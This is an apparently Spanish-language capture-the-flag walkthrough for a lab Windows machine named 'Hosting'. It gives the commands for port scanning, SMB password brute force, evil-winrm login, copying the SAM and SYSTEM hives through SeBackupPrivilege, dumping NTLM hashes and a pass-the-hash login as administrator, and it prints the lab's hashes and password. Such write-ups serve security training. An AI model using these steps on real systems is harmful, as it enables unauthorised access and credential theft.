Hosting
🔍 Dificultad: Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.76
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -p- --open 192.168.1.76 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 80, 135, 139, 445 y varios en el rango 49664-49670 están abiertos. Estos pertenecen a los servicios de HTTP, Microsoft RPC, NetBIOS-SSN, Microsoft-DS y otros puertos desconocidos, por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80,135,139,445 -v 192.168.1.76
para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80.

Revisamos directorios.
gobuster dir -u http://192.168.1.76 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
Encontramos el directorio /speed.

Adjuntamos el dominio a /etc/hosts.

🚀 EXPLOTACIÓN
Hacemos una lista de usuarios para realizar fuerza bruta.
nxc smb 192.168.1.76 -u usuarios -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

Listamos recursos compartidos. Pero no encontramos nada relevante.

Listamos usuarios.

Vemos que con m.davis tenemos su contraseña.

Comprobamos que j.wilson tiene la misma contraseña. Nos conectamos con evil-winrm.
evil-winrm -i 192.168.1.76 -u j.wilson -p 'H0$T1nG123!'

🔐 PRIVILEGIOS
whoami
Dado que el sistema cuenta con el permiso SeBackupPrivilege, es posible realizar una copia de los archivos SAM y SYSTEM para extraer los hashes de las credenciales.


Nos la descargamos.
*Evil-WinRM* PS C:\temp> download system
Info: Downloading C:\temp\system to system
Info: Download successful!
*Evil-WinRM* PS C:\temp> download sam
Info: Downloading C:\temp\sam to sam
Info: Download successful!
Extraemos los hashes.
samdump2 system sam > hashes.txt
Ahora con John los crackeamos.

Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
Nos conectamos. Ya somos root.
evil-winrm -i 192.168.1.76 -u administrator -H 41186fb28e283ff758bb3dbeb6fb4a5c

Last updated
Was this helpful?